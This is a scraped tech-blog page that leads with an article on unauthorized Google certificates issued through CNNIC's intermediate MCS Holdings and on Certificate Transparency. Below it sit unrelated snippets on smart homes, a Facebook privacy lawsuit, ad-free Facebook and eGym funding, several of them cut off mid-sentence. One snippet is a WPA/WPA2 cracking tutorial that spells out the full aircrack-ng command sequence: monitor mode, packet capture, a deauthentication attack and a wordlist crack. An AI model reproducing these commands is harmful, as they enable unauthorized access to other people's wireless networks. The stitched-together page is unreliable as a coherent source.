Google discovers new security holes in SSL — is the entire system fundamentally flawed?

Share This Article

Google has discovered that an intermediate certificate authority had issued unauthorized certificates for multiple Google domains. The problem arose because the intermediate authority, MCS Holdings, had issued certificates for the Google domains, despite not holding those domains itself.

The reason it’s critical that companies not mint certificates for websites they don’t operate themselves is because doing so breaks the function of SSL itself. Here’s how the system is supposed to operate:

Your PC contacts a Google server, which returns a certificate. Your computer uses that certificate to encrypt a data session. The server confirms that the key is good and establishes the secure session with your PC. When certificates are signed by third parties, it allows the false server to execute a classic man-in-the-middle attack.

In a man-in-the-middle attack, an intervening certificate authority can pretend to be the genuine issuing authority, particularly if the intermediate certificate company is given the full authority of an issuing CA, which is what happened here. That’s not supposed to happen, as Google points out — the original Certificate Authority, CNNIC (the Chinese Internet Network Information Center) should never have given such authority to MCS Holding in the first place.

Fixing the TLS/SSL system

The problem with the SSL system — in addition to all the bugs, at least — is that it relies on the idea that Certificate Authorities will always issue good certificates. History has proven this simply isn’t true — multiple Certificate Authorities have been hacked, including companies like VeriSign and the now-defunct DigiNotar. Google wants to revamp the process of issuing certificates with its Certificate Transparency initiative. This project would:

Make it impossible (or at least very difficult) for a CA to issue a SSL certificate for a domain without the certificate being visible to the owner of that domain.
Provide an open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or maliciously issued.
Protect users (as much as possible) from being duped by certificates that were mistakenly or maliciously issued.

Certificates would be logged, and the logs would be monitored by public servers that would periodically check to see if malicious or unauthorized certificates were being used across the net. For example, if Certificate Authority XYZ issued an unauthorized certificate for Gmail, a Certificate Transparency Monitor would detect the problem and alert Google itself. Finally, the logs and monitors would themselves be guarded by a cryptographic watchdog program, which would check to ensure that SSL certificates were properly logged and that the logs weren’t tampered with.

The other problem with the TLS/SSL system, beyond the fact that it relies on intrinsic trust, is that the system can be easily subverted. Unless certificates issued by a particular authority are revoked, those certificates can continue to be used to wreak havoc. This is why the recent Lenovo-Superfish debacle was so dangerous. Until Google, Microsoft, and Firefox updated their own software to reject the Komodo certificate, it remained available and functional — effectively end-running around any security that a website might try to provide.

Comments

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only. Things we used for cracking WPA & WPA2: Alfa AWUSO36H Wireless Card Windows 7-64bit (works on 32bit) VMware Workstation Kali Linux 2.0 Command to crack WPA & WPA2: airmon-ng sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up airodump-ng wlan0 airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0 aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0 aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap sudo ifconfig wlan0 down sudo iwcofnig wlan0 mode monitor sudo ifconfig wlan0 up Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux: In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.

Building a smarter home

The Jetsons presented a highly entertaining vision of what homes of the future would look like . The animated television show anticipated a world where humans would be able to do everything with just the push of a button. In many ways, the show turned out to be prophetic; today we have printable food, video chats, smartwatches and robots that help with housework — and flying cars may even be on the way. The challenge for companies is to integrate digital technologies in meaningful ways that enhance people’s homes and improve their lives. Many of the innovations to emerge over the past few years have been geared toward this kind of “push-button living.” Thanks to the rise of smartphones and the proliferation of cheap sensors, it is possible to make just about any household appliance “smart” and “connected.” By 2019, companies are expected to ship 1.9 billion connected home devices, bringing in about $490 billion in revenue. ...

Facebook ‘Class Action’ Privacy Lawsuit Moves To Austrian Supreme Court

A privacy lawsuit filed against Facebook last year by Viennese lawyer and data privacy activist Max Schrems has moved up to Austria’s Supreme Court which will rule on whether the suit can be treated as a class action. When Schrems kicked off the suit, back in July 2014, he invited adult non-commercial Facebook users located anywhere outside the U.S. and Canada to join the suit for free — and tens of thousands of people quickly took up the invitation. The legal action focuses on multiple areas where the plaintiffs argue Facebook has been violating EU data protection laws, such as the absence of effective consent to many types of data use; the tracking of Internet users through external websites; and the monitoring and analysis of users via big data systems. Facebook’s participation in the NSA’s PRISM surveillance program is also part of the complaint. In July the case suffered a setback when an Austrian regional co...

How ad-free subscriptions could solve Facebook

At the core of Facebook’s “well-being” problem is that its business is directly coupled with total time spent on its apps. The more hours you pass on the social network, the more ads you see and click, the more money it earns. That puts its plan to make using Facebook healthier at odds with its finances, restricting how far it’s willing to go to protect us from the harms of over use. The advertising-supported model comes with some big benefits, though. Facebook CEO Mark Zuckerberg has repeatedly said that “We will always keep Facebook a free service for everyone.” Ads lets Facebook remain free for those who don’t want to pay, and more importantly, for those around the world who couldn’t afford to. Ads pay for Facebook to keep the lights on, research and develop new technologies, and profit handsomely in a way that attracts top talent and further investment. More affluent users with more buying power in markets like the US, UK, and Canada command higher ad prices, effectively...

eGym raises $45M Series C for cloud-connected gym equipment and fitness software

eGym , the Munich-based startup that offers cloud-connected gym equipment and supporting cloud software and app for the fitness training floor, has closed $45 million in Series C funding. The round was led by new investor HPE Growth Capital, while existing investors, including Highland Europe, also participated. The problem that eGym is looking to solve is that, whilst gyms have moved from a bodybuilder market to a mass market in the last 20 years, the technology in gyms lags behind. That’s despite the fact that better use of technology can help to reduce customer churn, the biggest pain-point of both gym operator and gym users. Comprising of an app for both gym user and trainer, combined with the company’s connected strength machines, the eGym Cloud makes it possible for gym members to receive better fitness instruction and an evolving and personalised fitness plan based on data collected as they workout. And by providing a better workout feedback loop, gym goers can get an i...

Exciting Technology

Search This Blog